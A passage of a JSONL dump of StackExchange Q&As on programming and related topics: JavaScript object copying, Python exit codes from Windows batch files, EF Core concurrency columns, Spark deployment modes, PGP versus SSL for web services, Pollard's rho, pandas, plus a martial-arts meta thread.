If any of\n the fields of the object are references to other objects, just the\n reference addresses are copied i.e., only the memory address is\n copied.\n\nexample \n<code>let x={\"a\":1,\"b\":2};\nlet y=x; \/\/It makes a copy of the reference to x into y\n<\/code>\nSo, the addresses of x and y will be the same i.e. they will be pointing to the same memory location.\nso if you do this\n<code>y.a=9;\n<\/code>\nand now when you print y on the screen \n<code>console.log(y) \/\/ it prints {\"a\":9,\"b\":2};\n<\/code>\nbut the interesting fact here is , when you print x\n<code>console.log(x) \/\/ it also prints {\"a\":9,\"b\":2};\n<\/code>\nSo Now how to change this scenario??. The solution is a deep copy\n\nDeep copy\nA deep copy copies all fields and makes copies of dynamically\n allocated memory pointed to by the fields. A deep copy occurs when an\n object is copied along with the objects to which it refers.\n\nin Lehman terms you create a variable y allocate it a different memory location, copy all the members of x, assign the copied members to y\nthe easiest way to do it is by <code>stringifying<\/code> the object\n<code>let y=JSON.parse(JSON.stringify(x))\n<\/code>\nnow if we do\n<code>y.a=9\n<\/code>\nand print y\n<code>console.log(y) \/\/ it prints {\"a\":9,\"b\":2};\n<\/code>\nand if we print x\n<code>console.log(x) \/\/ it prints {\"a\":1,\"b\":2};\n<\/code>\n\n<code>\/\/\/ shallow copy\n\nlet x = {\n \"a\": 1,\n \"b\": 2\n};\nlet y = x;\ny.a = 9;\nconsole.log(y);\nconsole.log(x);\n\n\n\/\/ Deep Copy\n\nlet z = {\n \"a\": 1,\n \"b\": 2\n};\nlet t = JSON.parse(JSON.stringify(z));\nt.a = 9;\nconsole.log(\"z:\", z);\nconsole.log(\"t:\", t);<\/code>\n\n\n\nThis scenario becomes more fun when we have nested objects\n\n<code>let c = {\n \"a\": {\n \"A\": 1\n },\n \"b\": {\n \"B\": 2\n }\n};\nlet t = Object.assign({}, c); \/\/ It is also shallow copying\nt.a.A = \"7\"; \/\/ since a is a nested object so again reference is passed\nconsole.log(c);\nconsole.log(t)\nconsole.log(\"Second Scenario-------------------\")\n\n\nlet d = {\n \"a\": {\n \"A\": 1\n },\n \"b\": {\n \"B\": 2\n }\n};\nlet k = JSON.parse(JSON.stringify(d));\nk.a.A = 88\nconsole.log(d)\nconsole.log(k)<\/code>\nAnswer: That is because <code>y<\/code> & <code>x<\/code> both point to same memory location.If you want a separate copy , then deep copy the object. <code>JSON.parse<\/code> & <code>JSON.stringify<\/code> \n\n<code>var x = {\n a: 1,\n b: 2\n};\nvar y = JSON.parse(JSON.stringify(x));\ny.a = 20;\ndocument.getElementById(\"demo\").innerHTML = x.a;\ndocument.getElementById(\"demo1\").innerHTML = x.b;<\/code>\n<code><p id=\"demo\"><\/p>\n<p id=\"demo1\"><\/p><\/code>\n","meta":{"source":"stackoverflow","title":"Why javascript object value is changed?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the process by which a technique gets accepted as viable by a community such as SE?\n\nQuestion: I learn a Martial Art called Shorinji Kempo. The emphasis of this art is on wrist and fine joint Manipulation and strikes to 'vital points'. \nWhenever I answer a question relating to these areas I am asked (not unreasonably) to explain how I know these techniques work. \n\"Vital points\" is a difficult issue because of the unfounded claims made by 'alternative medicine' practitioners such as acupuncturists. 
While in effect this usually means striking the solar plexus at an upward angle or flicking the eyes with the tips of the fingers the use of the term \"vital points\" can also extend to points on the carotid artery on the neck or even just 'a place on the arm that is painful if you apply pressure \"like so\". It is rare that we actually, for example, strike to the side of the neck for safety reasons (although it is certainly less dangerous than giving someone concussion which some other martial arts are quite happy to do). There is a video where this is done https:\/\/youtu.be\/vSkD7BPpVK4 but as it is done by an instructor on his students (and not by competitors in an octagon) many users here suspect that the people shown are merely acting. \nWrist locks I thought would be an easy subject. But here too other users ask for evidence that they are practical for take-down purposes. It doesn't help that there are plenty of examples of aikido practitioners (the most famous practitioners of joint locks) being defeated by other martial artists. Indeed, those times I have been to aikido dojos I have seen little that is practical, and it's easy to see how this can be taken as evidence that this form of technique is inferior to others (such as judo throws). \nHowever even when I link video of a basic technique that I can do myself other users here (you know who you are but I'm not trying to continue the discussion here) claim that the clip is a fake, with a martial artist falling for no good reason. https:\/\/youtu.be\/0P16QY-CHRM or https:\/\/youtu.be\/qpPFwBdyMZg\nClips showing these against martial artists from other styles are impossible to find because there is no culture for entering competitions of other styles and such competitions ban many of these techniques in any case. \nWhen I looked into entering such competitions myself for example Judo bans these techniques and BJJ does not permit them for low grades (below blue belt). Other styles of Jujitsu also seem to have this approach. UFC style MMA permits these techniques but as this is practiced without a gi and also permits striking techniques opportunity for wrist locks would be minimal and in any case I see no reason to risk concussion over this. \nMost of the people on this site seem to be in a different country (I am in the UK) so we can't meet in order to film sparring match. \nI wouldn't usually particularly mind leaving this sort of thing unresolved, but since SE aims to be an authoritative source of information this seems very problematic to me as it is, as I see it, spreading misinformation. \nSo as stated in the title, the question is what would I need to show to have techniques of this kind accepted as viable in 'real life'? Is there any substitute for competition footage in cases where the technique is banned in competition? \nComment: I'm not sure why this is in meta. This is a fine main-site question.\nAnswer: I've said this before and I'll repeat: most accepted is not the same as correct. You don't need to convince everyone, you simply need to provide an answer that is useful to the person asking the question (and presumably anyone else who might have the same or a very similar question).\nThe best way is footage and studies. Luckily for you, there's a pretty big world of joint manipulation on video, and there's also a lot of police and security testimony about which ones work and under what conditions. 
Pressure point work is much more iffy and full of chicanery, but find the best evidence you can.\nSecond, describe, in detail what your experience is making the technique work or where it doesn't. People can compare it to their own experiences, and\/or try it out themselves and see if that works for them.\nYou don't have to make anyone accept your answer. But a good answer will at least provide sufficient information that people can apply it or have directions to research to learn\/apply it in their future.\nIf you can make techniques work reliably under stress, it doesn't matter what anyone else thinks. They can try it out or not.\nAnswer: Specific Approaches\nPlenty of methods exist for proving the efficacy of techniques.\n\nWhen I looked into entering such competitions myself for example Judo bans these techniques and BJJ does not permit them for low grades (below blue belt). \n\nSo go to a BJJ gym, instead of entering a competition, and try it on the blue belts there. As the question in question notes, you might not get a friendly response if you don't tell them you're liable to wristlock them. But there should be at least one blue, purple, brown, or black belt willing to let you try. Bringing a camera seems a bit much until you've been training there at least a few months, but you can still prove it to yourself.\n\nOther styles of Jujitsu also seem to have this approach. UFC style MMA permits these techniques but as this is practiced without a gi and also permits striking techniques opportunity for wrist locks would be minimal and in any case I see no reason to risk concussion over this.\n\nIt's not clear to me what a gi has to do with it. Combat SAMBO might be an option if you absolutely need a gi while allowing strikes, but you'd have to check their rulesets to see if wristlocks are allowed. But if you're saying that allowing strikes makes opportunities for wristlocks minimal, then I'd say you're already in major agreement with many of your interlocutors.\n\nMost of the people on this site seem to be in a different country (I am in the UK) so we can't meet in order to film sparring match.\n\nTry posting on Bullshido.org; they have members all over and at least used to have a philosophy of meeting up for things like this.\nThe General Problem\nThe generalized issue here, at least for me and I believe a few others of similar mind, is that we encourage pressure-testing techniques not for us in the context of discussion, but for anyone's own practice. \nI trained wristlocks weekly for about nine years in a context relatively similar to yours. I catalogued the various kinds, I tried them against \"resisting\" but generally compliant partners much as you describe in your own practice, I taught them. I still believe there's a place for wristlocks, but I see their role as relatively minor compared to other skills, and their reliability for purposes such as throwing or whole-body control to be more limited than most of their proponents admit. I discovered these things through pressure-testing these techniques and others and I think you might find that same process useful.\nThe specific issue that I think you are running into (e.g. here and here), is the difference between uke-tori training and actual uncooperative practice. The difference between the two is monumental. 
Simply put, evidence gained from an uke-tori scenario is not evidence at all, because every element of the interaction is governed by each person playing their designated roles of technique-applier and technique-receiver.\nComment: Regarding uke\/tori training versus uncooperative practice, see [this person's disillusionment with Shorinji kempo](http:\/\/www.bullshido.net\/forums\/showthread.php?t=125236).\nComment: A) that is 100% what I mean when I say compliant training no matter how you slice it. B) if your friend is a noob, then wristlocking him and claiming victory in an MMA context would be...unconvincing\nComment: I would advise sparring with more than just your friend. Let him bring you to class to spar with the other students too.\nComment: The issue with no gi situations as opposed to those where you are wearing a gi is that most of the best wristlocks are defenses against grabs. I'm not going to try to grab a hand in a live fight. Its just not an optimal move. Similarly if my opponent is trying to hit me I would use striking techniques before even trying to grab. In any case, I am not going to risk brain dammage over this.\nComment: The video he links to is an interesting one. There is basically no-one else in shorinji kempo who can do this to this extent but that is not compliant training. My own instructor knew that guy and learned a lot from him which he is passing on. The thing that you don't seem to realize is that this is not at all like aikido training in that you are not expected to 'feel' the correct way to do the technique. Rather you learn the balance breaking methods and then they will work. This guy started at what 9 years old? He was probably only learning locks for 3 years or so starting at 15\/16.\nComment: In any case, I have found out a good friend has started MMA. So it looks like I should be able to show you some wrist locks applied in that context before long.\nComment: I'm going to have to check when he started it's true. If it's too recent then there's no point in posting it. I'll spar with him either way in any case.\nComment: I'll think about it. As I said though so far as I am concerned if I prove my point sparing with some guy and suffer brain damage sparing with another I loose.\nComment: 1) Someone who hasn't sparred with facepunching has no standing to make any claims about their ability to execute techniques in self-defense. 2) I think you may be overstating the brain damage involved in MMA sparring. It's not like you lose 10 IQ points from one light session, or even ten. See http:\/\/martialarts.stackexchange.com\/a\/999\/347\nComment: Sparing with facepunching as you put it is one thing. Full contact MMA is another. Of course I have been punched in the face, I have also been outright winded by a kick and had my shoulder joint wretched. I'm fine with that. I'm just not prepared to risk brain dammage over an argument on the internet. A single strike to the head could result in permanent mental health problems completely defeating the point of self defense.\n","meta":{"source":"martialarts.meta.stackexchange","title":"What is the process by which a technique gets accepted as viable by a community such as SE?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't install ubuntu along windows 7\n\nQuestion: I boot from a DVD the last version of ubuntu 12.04 x64(because i have 8g. 
of ram) ,hit install Ubuntu ,check Install Along windwos 7(or something like this ,anyway the first option) and the button in the bottom right corner says \"Restart to install\" or just restart...i cant remember.\nSo ,i hit the button than ,the screen goes black ,some proceses are stopped and on the middle of the screen it writes like this \" Please remove installation media and close the tray (if any) then press ENTER: \"\nThe DVD rom opens and i remove the dvd ,close the tray ,pushing enter and the windows is starting ,no instalation ,no file copied to my PC ,nothing.\nComment: are you sure no file is copied? check the disk usage ? type `diskmgmt.msc` in run prompt and press enter to see the details\nAnswer: I been messing with it all day too and I have problems with the Ubuntu Download link on their home page. I tried unsuccessfully to boot from a live USB and tried burning the iso image to CD, and it said something like that the iso image was not valid or something like that. I choose the latter option and downloaded a image from the Bitttorrent link also in the Ubuntu website that I had better luck installing a dual boot machine with win 7 and ubuntu 12.04 today.\nAnswer: Looks like your Ubuntu DVD is corrupt or somehow broken. Verify by using a different Ubuntu ISO.\nComment: How do i do that?\nComment: Follow this: https:\/\/help.ubuntu.com\/community\/HowToMD5SUM\/#MD5SUM_on_Windows\nComment: So...why use a different ISO?\n","meta":{"source":"askubuntu","title":"Can't install ubuntu along windows 7","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"# more to go\" notification text (when typing comments) is not descriptive enough\n\nQuestion: I went to leave a comment on a post just now and had the message \"5 more to go\". It took me a little while to understand what it was referring to but realised it meant characters after a few minutes. Perhaps this could be made clearer? Maybe something like \"Your comment is too short. * more to go\"\nEdit: I've just noticed that before you start typing it says 'add at least 15 chars\", I didn't see that when I'd started typing. Not sure if this is enough or if it need to be clearer. Could just be a case of PEBKAC!\nAnswer: Well, actually it says\n\nenter at least 15 characters\n\nbefore you type anything in the comment textbox, and then\n\n14 more to go...\n\nafter you've typed the first character. It seems fairly clear to me; I've never heard this request before.\n","meta":{"source":"graphicdesign.meta.stackexchange","title":"\"# more to go\" notification text (when typing comments) is not descriptive enough","dup_signals":{}},"subset":"stackexchange"} +{"text":"Incorrect exit code in python when calling windows script\n\nQuestion: I don't seem to be getting the correct exit code from subprocess.call on Windows.\n<code>import subprocess\nexit_code = subprocess.call(['ant.bat', 'fail'])\nprint exit_code # prints 0\n<\/code>\nDoing the same thing on windows seems to return something other than 0\n<code>> echo %errorlevel%\n0\n> ant fail\n> echo %errorlevel%\n1\n<\/code>\nShouldn't the values from both calls give the same value? 
Am I doing something wrong?\nIn the worst case, how do I check the value of %errorlevel% in my python script?\nUPDATE:\nI tried something like this to get the errorlevel value:\n<code>environment = os.environment.copy()\ncmd = subprocess.Popen(['ant.bat', 'fail'], env = environment)\nfor key, value in environment.items():\n print '%s = %s' % (key, value)\n<\/code>\nHowever I do not see errorlevel in that dictionary (os.getenv['errorlevel'] also fails).\nComment: Your code works for me (on Windows 7). Can you give some more detail? May it be that the problem is in the .bat file itself?\nAnswer: A process exit code and the errorlevel environment variable aren't the same:\n<code>ant.bat:\n\nif \"%1\"==\"batch_fail\" exit \/B 1\nif \"%1\"==\"proc_fail\" exit 1\n\n>>> import subprocess\n>>> subprocess.call(['ant.bat', 'batch_fail'])\n0\n>>> subprocess.call(['ant.bat', 'proc_fail'])\n1\n<\/code>\nbatch_fail will set the errorlevel to 1, but that's no longer available after the shell exits. proc_fail, however, sets the process exit code to 1. The only solution that comes to mind is a wrapper batch file that calls ant.bat and sets the process exit code according to the errorlevel:\n<code>ant_wrapper.bat:\n\n@echo off\ncall ant.bat %1\nif errorlevel 1 exit 1\n\n>>> subprocess.call(['ant_wrapper.bat'])\n0\n>>> subprocess.call(['ant_wrapper.bat', 'batch_fail'])\n1\n>>> subprocess.call(['ant_wrapper.bat', 'proc_fail'])\n1\n<\/code>\nEdit:\nYour update got me thinking about an alternate approach using Popen. You can run the batch file via cmd's \/K option, which will run a command without exiting. Then simply send <code>exit %errorlevel%<\/code> via stdin, and communicate():\n<code>#test errorlevel==1\n>>> p = subprocess.Popen(['cmd', '\/K', 'ant.bat', 'batch_fail'], \n stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n>>> stdoutdata, stderrdata = p.communicate(b'exit %errorlevel%\\r\\n')\n>>> p.returncode\n1\n\n#test errorlevel==0\n>>> p = subprocess.Popen(['cmd', '\/K', 'ant.bat'], \n stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n>>> stdoutdata, stderrdata = p.communicate(b'exit %errorlevel%\\r\\n')\n>>> p.returncode\n0\n<\/code>\nComment: Thank you for that info. So do you think I can get the %errorlevel% value with Popen? Please see my update to the original question. I posted my attempt at using Popen. Can I make that work somehow?\nComment: Thank you that does work. Is there a way to do the same thing without redirecting stdout though? I want to keep printing the output to the console, but removing stdout=PIPE results in all kinds of craziness for me (I sometimes end up having to close the whole terminal window.)\nAnswer: I was able to get the correct behavior by using the batch <code>call<\/code> command, like\n<code>cmd = [os.environ['COMSPEC'], '\/c', 'call', bat_file]\ntry:\n subprocess.check_call(cmd)\nexcept subprocess.CalledProcessError:\n # Error handling code\n<\/code>\n(I used <code>subprocess.check_call<\/code> but <code>subprocess.call<\/code> ought to work the same way).\nIt's also always a good idea to put <code>if errorlevel 1 exit 1<\/code> after every command in your batch script, to propagate the errors (roughly the equivalent of bash's <code>set -e<\/code>).\nAnswer: <code>os.system('ant.bat fail')<\/code> does exactly what you want. 
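(A quick follow-up for Python 3 readers: the COMSPEC / <code>/c call</code> approach from the <code>subprocess.check_call</code> answer above maps directly onto <code>subprocess.run</code>. The sketch below assumes Python 3.5+ on Windows and reuses the <code>ant.bat fail</code> example from this question; it is an illustration, not the only way to do it.)
<code>
# Sketch of the "run the batch file through cmd /c call" idea from the answer
# above, written with subprocess.run. "ant.bat" and the "fail" target are the
# example names used in this question.
import os
import subprocess

cmd = [os.environ.get("COMSPEC", "cmd.exe"), "/c", "call", "ant.bat", "fail"]

result = subprocess.run(cmd)
print(result.returncode)          # mirrors the batch ERRORLEVEL

# or turn a non-zero ERRORLEVEL into an exception:
try:
    subprocess.run(cmd, check=True)
except subprocess.CalledProcessError as err:
    print("ant.bat failed with exit code", err.returncode)
</code>
Using <code>check=True</code> is the <code>subprocess.run</code> counterpart of <code>check_call</code>, so the error handling shown in that answer carries over unchanged.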
It does return the errorlevel.\n","meta":{"source":"stackoverflow","title":"Incorrect exit code in python when calling windows script","dup_signals":{}},"subset":"stackexchange"} +{"text":"Optimizing a 2 parameter distance function on line segments (ACM ICPC Regionals Elim.)\n\nQuestion: This problem is a subproblem of a problem posed in the ACM ICPC Kanpur Regionals Elimination Round:\nGiven 2 line segments bounded by the 2D points <code>(Pa, Pb)<\/code> and <code>(Pc, Pd)<\/code> respectively, find <code>p<\/code> and <code>q<\/code> (in the range <code>[0,1]<\/code>) that minimizes the function \n<code>f(p, q) = D(Px, Pa) + D(Py, Pd) + k D(Px, Py) where \n 2 <= k <= 5, \n Px = p Pa + (1-p) Pb, \n Py = q Pc + (1-q) Pd and \n D(x, y) is the euclidean distance between points x and y\n<\/code>\n(effectively, Px and Py are points on the line segments and the function encodes the cost of going from Pa to Pd through a connecting link of a cost that is k times the euclidean distance)\nSome observations regarding this function:\n\nParallel line segments will always cause atleast one of <code>p<\/code> and <code>q<\/code> to be either 0 or 1\nIntersecting line segments will always cause <code>p<\/code> and <code>q<\/code> to locate the point of intersection of the line segments (the triangle inequality can be applied to prove this)\n\nThe question:\nIn the general case where the lines are inclined and potentially separated, how do we minimize this function?\nComment: I don't understand observation 2. Counterexample: the two line segments form a tall \"X\" with Pa and Pd epsilon-close to each other, and the point of intersection (Pi) at both midpoints. Now stretch the X vertically to infinity. Then D(Pa,Pi) + D(Pi,Pd) >> D(Pa,Pd) = epsilon.\nComment: you should write this in c or c++ !\nComment: @Svisstack - The language used is not important to me, the algorithm is.\nComment: @Svisstack - Would you require a clarification of the question in C\/C++? If so, which part?\nComment: @Steve - you're right. It's a mistake in my observation.\nComment: No problem. Re: your other comment, I think there are many numerical methods for solving this problem. Because this problem is relatively simple, a simpler method may be best. In the competition, how are answers evaluated? What makes a \"good\" answer?\nComment: Answers are evaluated based on satisfying an accuracy constraint (numerically 10^-5 in this case) as well as satisfying a runtime limit (~1s). I've realized that a simple 2D Binary search by using the gradient of the function as the predicate should suffice. @Steve - Do you have any other alternatives in mind?\nAnswer: I think you should be able to take the partial derivatives of <code>f<\/code> with respect to <code>p<\/code> and <code>q<\/code>, set them to 0, and solve for <code>p<\/code> and <code>q<\/code>. That will give you a (local) minimum. If the minimum has <code>0 <= p <= 1<\/code> and <code>0 <= q <= 1<\/code>, you're done, otherwise check the four endpoints (<code>p=0,q=1<\/code>, and so on).\nI'm not positive that this will handle all degenerate conditions, but it should be a good start.\nComment: I mulled over it and saw a couple of sites on function minimization. This is indeed the generic method, but getting the analytical solution to the equation pair df\/dp = 0 and df\/dq = 0 turns out to be really messy. 
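One way to sidestep that algebra is to exploit structure: f(p, q) is a sum of Euclidean norms of affine functions of (p, q), hence convex, so a nested ternary search over [0,1] x [0,1] homes in on the minimum reliably. The sketch below rests on that convexity assumption; the coordinates and k value at the bottom are made-up examples, not data from the contest problem.
<code>
# Rough sketch: nested ternary search for min over p, q in [0,1] of
#   f(p, q) = D(Px, Pa) + D(Py, Pd) + k * D(Px, Py)
# f is convex (a sum of norms of affine maps), so ternary search is safe.
import math

def dist(a, b):
    return math.hypot(a[0] - b[0], a[1] - b[1])

def lerp(a, b, t):
    # t*a + (1-t)*b, matching Px = p*Pa + (1-p)*Pb in the problem statement
    return (t * a[0] + (1 - t) * b[0], t * a[1] + (1 - t) * b[1])

def f(p, q, Pa, Pb, Pc, Pd, k):
    Px, Py = lerp(Pa, Pb, p), lerp(Pc, Pd, q)
    return dist(Px, Pa) + dist(Py, Pd) + k * dist(Px, Py)

def ternary(g, lo=0.0, hi=1.0, iters=60):
    # valid for a convex g on [lo, hi]
    for _ in range(iters):
        m1, m2 = lo + (hi - lo) / 3, hi - (hi - lo) / 3
        if g(m1) < g(m2):
            hi = m2
        else:
            lo = m1
    return (lo + hi) / 2

def minimize(Pa, Pb, Pc, Pd, k):
    best_q = lambda p: ternary(lambda q: f(p, q, Pa, Pb, Pc, Pd, k))
    p = ternary(lambda p: f(p, best_q(p), Pa, Pb, Pc, Pd, k))
    q = best_q(p)
    return p, q, f(p, q, Pa, Pb, Pc, Pd, k)

# made-up example: two horizontal segments and k = 2
print(minimize((0, 0), (4, 0), (0, 3), (4, 3), 2))
</code>
The inner search minimizes over q for a fixed p; the outer search then minimizes the resulting one-variable function of p, which is again convex because partial minimization preserves convexity.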
I'm looking for numerical solutions to the problem - possibly using binary search in 2 dimensions or possibly a variant of the Newton Raphson method.\n","meta":{"source":"stackoverflow","title":"Optimizing a 2 parameter distance function on line segments (ACM ICPC Regionals Elim.)","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to write universal optimistic concurrency Timestamp column that works with SQL Server and with Postgresql\n\nQuestion: We need to support both databases: SQL Server and Postgresql. For optimistic concurrency we use a <code>[Timestamp]<\/code> column.\nFor SQL Server this code works:\n<code>public class DbEntity\n{\n ...\n [Timestamp]\n public byte[] Timestamp { get; set; }\n ...\n}\n<\/code>\nIn the database, this field is mapped to:\n<code>[Timestamp] [timestamp] NOT NULL\n<\/code>\nFor Postgresql we need something like this:\n<code>public class DbEntity\n{\n ...\n [Timestamp]\n public uint Version { get; set; }\n ...\n}\n<\/code>\nwithout column in database, because xmin system column used - https:\/\/www.npgsql.org\/efcore\/modeling\/concurrency.html?tabs=data-annotations\nIt is possible to write universal entities that works with both databases? I want to write them once, and do not support 2 applications or 2 branches in source control.\nAnswer: You can use have both properties on your .NET type and vary the EF model configuration based on the provider being used, and ignore the property for the other databases:\n<code>public class Blog\n{\n public int Id { get; set; }\n\n [Timestamp]\n public byte[] Timestamp { get; set; }\n\n [Timestamp]\n public uint Version { get; set; }\n}\n\n\/\/ In the model configuration:\nprotected override void OnModelCreating(ModelBuilder modelBuilder)\n{\n if (Database.IsSqlServer())\n {\n modelBuilder.Entity<Blog>().Ignore(b => b.Version);\n }\n else if (Database.IsNpgsql())\n {\n modelBuilder.Entity<Blog>().Ignore(b => b.Timestamp);\n }\n}\n<\/code>\nComment: It is also possible to make with only one property `byte[] Timestamp`. In this case additionally `Conversion` must be configured: https:\/\/github.com\/alex-t0\/EntityFrameworkCoreConcurrencyTokens\/blob\/single-field\/WebApp\/Db\/AwesomeDbContext.cs.\n","meta":{"source":"stackoverflow","title":"How to write universal optimistic concurrency Timestamp column that works with SQL Server and with Postgresql","dup_signals":{}},"subset":"stackexchange"} +{"text":"Difference between spark standalone and local mode?\n\nQuestion: What is the difference between Spark standalone and Local mode?\nComment: Possible duplicate of [What is the difference between Spark Standalone, YARN and local mode?](http:\/\/stackoverflow.com\/questions\/40012093\/what-is-the-difference-between-spark-standalone-yarn-and-local-mode)\nComment: Yes question is duplicate but answer is not. That answer was not clear to me\nComment: please look at [this](http:\/\/stackoverflow.com\/a\/40013023\/647053) This question is possible duplicate.\nAnswer: Spark standalone is a resource manager which can work on a cluster. It is simply the built in resource manager as opposed to an external one like yarn.\nSpark local runs without any resource manager, everything runs in a single jvm (you can decide the number of threads). This is aimed for testing locally.\nComment: In addition to that.. 
you can use local mode for the development purpose where you do not want to eat up the cluster resources and looking for the faster execution time during unit testing or debugging.\n","meta":{"source":"stackoverflow","title":"Difference between spark standalone and local mode?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is PGP suitable for encrypting webservices?\n\nQuestion: I would like to know if I can use of PGP to ensure SOAP webservices confidentiality?\nI don't want use SSL, it's kind of slow mechanism to make a tunnel for high throughput data transaction. \nI though cypher data using a symmetric key, the key will be encrypted to by a asymmetric public key. And push the message in the network, just the intended receiver can read it. \nIs it a good fair pattern for web services?\nAny help will be greatly appreciated.\nRegards\nComment: Remember the old advice when it comes to security: \"Don't roll your own!\"\nAnswer: SSL will be faster than SOAP+PGP. Cryptographically, both SSL and PGP are hybrid systems which use public key cryptography to protect symmetric session keys. In practice, SSL has been tuned on the client and server side to do what it's doing quickly, PGP hasn't been optimized for this case. And you'll have to figure out your key distribution and trust mechanism if you roll your own PGP method.\nDoing your own encryption will have the advantages of protecting it from the usual cases - MITM proxies, accelerator decryption.\nWithout knowing more about your app, it's hard to say, but in most cases, it's not worth it to go your own way. SSL provides pretty darn good security for the average application.\nComment: I am just afraid of the tunneling\/bidirection effort in SSL.\nComment: And would like make perplex a hacker if he succeed breaking our security network. Even he get access to the message, he can't be sure decyphing it correctly, 'cause in all cases the webservice will output a response tuple : cypher and the encrypted session key or a misleading key whether he is recognized in our identity\/user manager.\nComment: I'm beginning to feel two or more of us don't fully understand the question.\nAnswer: PGP\/GPG is generally not used for web services. It relies on anyone communicating to have the public key of who they're communicating with. In web services this generally isn't guaranteed. So depending on the type of service you're providing this might not be ideal. \nIf you're trying to only provide services to a select group of people then you'd have to make sure you have a keyserver set up, all users would have to generate\/have PGP\/GPG keys, all users would have to upload those keys to the keyserver, and your application would have to provide means to configure which keyserver to use. \nIn my opinion it's not worth the overhead to use PGP\/GPG instead of SSL\/TLS. Any kind of slowness you might think SSL\/TLS has is made up with ease of use and accessibility. And in all honesty, it's really not slow. There's a reason why most applications use it for web-based security. 
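For completeness, the hybrid pattern the question proposes (encrypt the payload with a fresh symmetric key, then wrap that key with the recipient's public key) looks roughly like the sketch below. It uses the third-party Python <code>cryptography</code> package purely as an illustration; the AES-GCM/RSA-OAEP choices and key sizes are my assumptions, and nothing here is an argument against simply using TLS.
<code>
# Sketch of the hybrid scheme described in the question: a fresh AES-GCM key
# encrypts the payload, and RSA-OAEP wraps that key for the recipient.
# Requires a recent version of the third-party "cryptography" package;
# all algorithm and size choices are illustrative assumptions.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

OAEP = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

recipient = rsa.generate_private_key(public_exponent=65537, key_size=2048)

def encrypt_for(public_key, payload: bytes):
    data_key = AESGCM.generate_key(bit_length=256)
    nonce = os.urandom(12)
    ciphertext = AESGCM(data_key).encrypt(nonce, payload, None)
    return public_key.encrypt(data_key, OAEP), nonce, ciphertext

def decrypt(private_key, wrapped_key, nonce, ciphertext):
    data_key = private_key.decrypt(wrapped_key, OAEP)
    return AESGCM(data_key).decrypt(nonce, ciphertext, None)

blob = encrypt_for(recipient.public_key(), b"the SOAP envelope bytes go here")
print(decrypt(recipient, *blob))
</code>
As the first answer notes, both PGP and SSL are hybrid systems of exactly this shape internally, so the practical difference is less about the cryptography and more about session reuse, tooling, and implementation maturity.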
\nStraight from the SOAP Wikipedia Page\n\nSOAP may also be used over HTTPS (which is the same protocol as HTTP at the application level, but uses an encrypted transport protocol underneath) with either simple or mutual authentication; this is the advocated WS-I method to provide web service security as stated in the WS-I Basic Profile 1.1.\nAnswer: SSL is already included in most libraries nativelly, so the difference between a plain text webservice and the SSL version is negligible in terms of development on both sides.\nIf the client makes use of persistent connections or reuses the SSL session, the negotiation between client and server is even lighter and faster.\nThe authentication proccess is easier by using a well-known Certificate Authority, so there is no need to exchange keys.\nAlso, there are SSL-accelerators which use hardware specific components to reduce CPU load.\n","meta":{"source":"security.stackexchange","title":"Is PGP suitable for encrypting webservices?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pollard's Rho Method\n\nQuestion: I can't get my head around Pollard's Rho Method for solving discrate log problem \nI have read in a book:\n\nThe basic idea is to pseudorandomly generate group elements of the\n form \u03b1^i \u00b7 \u03b2^j\n\nSo,what are i and j\n\nWe continue until we obtain a collision of two elements, i.e., until\n we have\n \u03b1^i1 \u00b7 \u03b2^j1 = \u03b1^i2 \u00b7 \u03b2^j2\n\nWhy does finding a collision mean that we have solved the problem??\nI understand Pollard's Rho Method for factorization ,but I can't see how it's similar to Pollard's Rho Method for solving discrate log\nAnswer: \nWhy does finding a collision mean that we have solved the problem?\n\nIf we find a collision:\n$\\alpha^{i1} \\cdot \\beta^{j1} = \\alpha^{i2} \\cdot \\beta^{j2}$\nthen we know that:\n$\\alpha^{i1-i2} = \\beta^{j2-j1}$\nAnd so, if we know the order of the group (which we generally do), then we can compute $({i1-i2})^{-1}$, and so, we have:\n$\\alpha = \\beta^{(j2-j1) \\cdot ({i1-i2})^{-1}}$\nTada, we're done.\n\nI understand Pollard's Rho Method for factorization ,but I can't see how it's similar to Pollard's Rho Method for solving discrate log\n\nActually, the similarity isn't in what you do when you find a collision, it's a clever way of searching for collisions without using a huge amount of memory. \nHere's that idea behind the Rho method: if we designate $F^n(x)$ as the function $F$ iterated $n$ times, for example, $F^4(x) = F(F(F(F(x))))$, and $F$ as a finite range of size $\\lambda$, then $F^n(x) = F^{2n}(x)$ for some $n$. In addition, if $F$ is a random function, then $n$ will (with good probability) be $O(\\sqrt{\\lambda})$. This allows us to search for a collision with a small amount of memory (and at a constant cost factor over more obvious techniques that do use a table for $F$ values).\n","meta":{"source":"crypto.stackexchange","title":"Pollard\u2019s Rho Method","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to replace a string in a column based on the value of another column?\n\nQuestion: I have this dataframe:\n<code>df = pd.DataFrame([['US123','1111'],\\\n ['CA456', '2222'],\\\n ['US123', '3333'],\\\n ['US123','4444'], \\\n ['CA456', '5555']], columns=['ID', 'Notes'])\ndf\n<\/code>\n\nThe desired output is:\n\nWhat is the best way to add string <code>; CA<\/code> to column <code>Notes<\/code> when the value in column <code>ID<\/code> starts with <code>CA<\/code>? 
